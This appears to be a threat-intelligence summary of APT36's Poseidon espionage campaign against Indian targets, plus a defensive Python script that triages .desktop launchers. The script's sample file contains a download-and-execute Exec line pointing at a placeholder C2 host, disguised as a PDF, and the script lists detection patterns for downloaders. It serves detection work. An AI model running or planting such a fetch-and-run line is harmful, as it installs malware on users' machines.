APT36, also known as Transparent Tribe, has expanded its cyber-espionage operations targeting Indian institutions using sophisticated infection chains and a new backdoor called Poseidon. The group employs advanced phishing techniques and resilient command and control infrastructure to maintain persistent access and gather sensitive information. #APT36 #Poseidon #MythicFramework #IndianGovernment #CyberEspionage
Keypoints
- APT36 has extended its targeting to include Indian railway, oil and gas infrastructure, and the Ministry of External Affairs.
- Infection chains involve disguised .desktop files that download malicious payloads from remote servers.
- The Poseidon backdoor, built on Mythic, provides persistent access, credential harvesting, and lateral movement capabilities.
- The malware infrastructure relies on redundant C2 servers and active Mythic command and control services on DigitalOcean.
- Phishing campaigns impersonate Indian military and government domains using subdomains with misleading TLDs to steal credentials.
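As an added illustration (not code from the original report), the following Python triage checks a Linux `.desktop` launcher for the traits described in the second keypoint: a launcher named like a document whose `Exec` line fetches and runs a remote payload. Both sample files are constructed for the example and the C2 host is a placeholder.

```python
import configparser
import re

# Constructed sample: a launcher disguised as a PDF whose Exec line stages and
# runs a remote download. The host name is a placeholder, not a real indicator.
SUSPECT_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Icon=application-pdf
Terminal=false
Exec=sh -c "curl -fsSL http://c2.example.invalid/a -o /tmp/.a && sh /tmp/.a"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Exec=gedit %U
"""

DOWNLOADER = re.compile(r"\b(curl|wget|python3?|perl|bash|sh|nohup)\b")
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
DOC_EXTENSION = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)$", re.IGNORECASE)
STAGING_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")


def triage_desktop(text: str) -> list[str]:
    """Return findings for a .desktop file body; an empty list means nothing was flagged."""
    parser = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    parser.read_string(text)
    if "Desktop Entry" not in parser:
        return ["no [Desktop Entry] group"]
    entry = parser["Desktop Entry"]          # key lookup is case-insensitive
    exec_line = entry.get("Exec", "")
    findings = []
    if REMOTE_URL.search(exec_line):
        findings.append("Exec fetches from a remote URL")
    if DOWNLOADER.search(exec_line):
        findings.append("Exec invokes a downloader or shell interpreter")
    if any(d in exec_line for d in STAGING_DIRS):
        findings.append("Exec stages a file in a world-writable directory")
    if DOC_EXTENSION.search(entry.get("Name", "")):
        findings.append("launcher name masquerades as a document")
    return findings
```

Run it over launchers collected from user home directories (for example `~/Desktop` and `~/.local/share/applications`) to surface candidates for closer review.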